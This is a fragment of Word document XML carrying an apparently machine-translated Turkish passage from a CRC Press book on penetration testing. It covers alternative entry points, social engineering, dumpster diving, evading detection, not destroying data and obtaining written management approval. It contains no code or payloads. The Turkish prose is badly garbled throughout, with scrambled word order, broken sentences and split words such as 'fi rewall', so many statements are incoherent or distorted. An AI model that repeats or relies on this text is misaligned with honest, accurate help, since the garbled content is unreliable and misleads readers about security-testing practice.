          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>deney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olunu seçin. penetrasyon test de bu yöntemi kullanmalısınız yüzden çoğu gerçek saldırganlar, değerl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rota deneyecektir. Test, bir şirketin ağı nüfuz teşebbüs edilirse, şirketin fi rewall (tabii ki, fi rewall test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ldu sürece) tüm güvenlik dikkati olacak çünkü nerede saldırıyı başlamak için en iyi yer olmayabilir odakland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lesserguarded alanlarını saldırı deneyin. Alternatif giriş noktaları arayın; örneğin, vb bir şirketin iş ortakları,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ağ hizmetlerinde, masaüstü bağlı modemler, bağlantıları Modern kurumsal ağlar sadece fi rewall çok daha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>noktaları var, bu yüzden tam yararınıza kullanm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RC Press LLC tarafından</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>belirtilen politikalara uygun hale konsantre. Süreçler herkes kurallara uyar zaman iyi çalışabilir, ancak bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>veya göz ardı edildiğinde öngörülemeyen sonuçları olabilir. Bir test saldırıyı gerçekleştirirken nedenle, son derece</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanın; Bir Web sitesine 1000 bayt URL girin; log bir ziyaretçilerin içine başkasının adını imzalamak; Bir sistem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anormallik veya uyumsuzluk temsil şey deneyin. Gerçek saldırganlar konusu sistemin veya kuruluşun kurallarına</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ne de tester gerek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knoloji, otomatik saldırılar münhasıran güvenmeyin. bu araçlar kullanmak daha “çekici” (ve kesinlikle daha kolay)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zaman bir sistemi giren en etkili yöntem ortaya olmayabilir. teknik olarak gelişmiş olmasa da, önemli güvenlik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>çıkarabilir ve göz ardı edilmemelidir, “düşük teknolojili” saldırıların vardır. Toplum mühendisliği yaklaşımının bu tip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sosyal mühendislik saldırı başlatmak için gerekli olan tek araç tester </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ses, telefon, ve insanlarla konuşmak yeteneği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yöntemin basitliğine rağmen (ya da belki de, bunun için), sosyal mühendislik değerli bilgiler elde etmek için bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>son derece etki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donunun dalış” da etkili düşük teknolojili araç olabilir. Çöp bidonunun dalış nd değerli bilgiler fi amacıyla konunun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eylemini tanımlamak için kullanılan bir terimdir. En çöp kutularının bulunan tipik bilgiler eski sistem çıktısı, şifre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>personel bilgileri, raporların taslaklarını ve eski faks nakillerini almaktadır. bir liman çalışan yaklaşık olarak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>deneğin bilgisayarına tarama, aynı zamanda liman tarama gerektirdiğini teknik beceri herhangi gerektirme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işilerarası iletişimde çok yetenekli olmayabilir test kullanıcılarının o etkili bir araç haline sosyal mühendislik gerekli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>içeriyo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ana hedeflerinden biri, algılama kaçınmaktır. penetrasyon testi temel ilke bilgileri kendi bilgisi veya onayı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>denekten elde edilebilir olmasıdır. Bir test test suçüstü yakalandı edilirse, bu söz konusu saldırı senaryosuna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>savunma yeterli olduğunu, de fi, tanımı gereği, anlamına gelmektedir. Aynı şekilde, test algılamak veya bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için kullanılabilir “fi ngerprints” bırakarak kaçınmalıdır. Bunlar fi ngerprints tester ve bir sistemi etrafında</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dair kanıt bulunmaktadır. fi ngerprints fiziksel (örneğin eksik raporlar, büyük fotokopi faturaları) olabilir ya da</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>örneğin, test ya da bir binaya giriş ve çıkış günlüğü kapı giriş kontrolleri erişimini detaylandırma sistem</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ki durumda da,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgilerin imha yönetimi tarafından (yazılı olarak) testin bir parçası olarak tanımlanır ve onaylanır de fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemde herhangi bir şey yok etmeyin. Bir penetrasyon testinin amacı bir sistem veya süreç içinde fl aws ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>çıkarmaktır - bilgi yok etmek değil. şirket bilgilerinin gerçek yıkımı sadece onun (potansiyel olarak değerl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irketi mahrum, ama aynı zamanda etik olmayan bir davranış olarak yorumlanır ve disiplin veya yasal işlem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olabilir. örgütün yönetim testinin bir parçası olarak bilginin gerçek yıkımını gösteren test isterse, test gereksinimi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>teste tabi tutulan yönetimin yazılı onayını almak için emin olmalıdır. Tabii ki, “fi ngerprints bırakmaz etm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er tester gizleyecekti sistem kayıtları değiştirebilir isteyebilirsiniz. Bu kabul edilebilir olsun ya da olmasın test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önce test öznenin yönetimi ile görüşmek gereken bir konudu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ademeli iyileştirme fırsat vermeyen etmeyin. Çoğu penetrasyon testi başarılı olabilmeleri için birçok araç ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanılmasını içermektedir. Bu tekniklerin çoğu tamamen bir kuruluşun güvenlik başarısızlığa bir organizasyon veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zayıflık maruz olmayacaktır. Ancak, bu tekniklerin her biri yaklaştıkça testin fi nal hedefine tester hareket ede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örgütün güvenliğini gösterecektir tek zayıflık veya güvenlik açığı için bakarak, tester, birleştirildiğinde, aynı derecede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>birçok önemli, daha küçük zayıflıkları göz ardı edilebilir. Gerçek saldırganlar sonlu sabırla olabilir; böylece test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>taktik değiştirerek hazır olun. Her deney çalışacak değil, her teknik başarılı olacaktır. Çoğu penetrasyon test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>çalışmasına tekniklerin standart “araç seti” var. Ancak, farklı sistemler, farklı saldırılarına açıktır ve farklı test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gerektirebilir. test akım bir çalışmıyorsa, başka bir yöntem geçmek için hazırlanmış olmalıdır. Bir elektronik saldırı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sonuçlar veren değilse, fiziksel veya işlevsel saldırıya geçin. girişimleri bir şirketin ağ bağlantısı çalışmayan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şekilde ise şirketin çevirmeli bağlantılar aracılığıyla ağa erişmeyi deneyin. son kez çalıştı saldırı konusu aynı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bu kez başarılı olmay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RC Press LLC tarafından</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>keşfetmek için çok daha iyi bir konumda bulunuyo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Planlam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gerçekleşebilir önce, açık bir test planı hazırlanmalıdır. test planı hedefleri ve test hedefleri detay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parametreleri özetlemektedir ve test ekibi ve hedef organizasyonun yönetiminde hem beklentilerini anlatacağı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planlama en önemli parçası hedef organizasyonun yönetiminin katılımıdır. yönetim onayı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Penetrasyon testleri etik olmayan olmasının yanı sıra, makul “casusluk” olarak kabul edilir ve çoğu bölgelerde yasa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tester tam ayrıntılı olarak test nişan belgelemek ve devam etmeden önce yönetimden yazılı onay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ekibi konusu organizasyonun parçasıysa, organizasyonun yönetim ekibinin çabaları bilir ve bunlardan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>önemlidir. test ekibi organizasyon yapısının dışında ve testi yapıyorsa “kiralık” testi gerçekleştirmek için yönetimin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
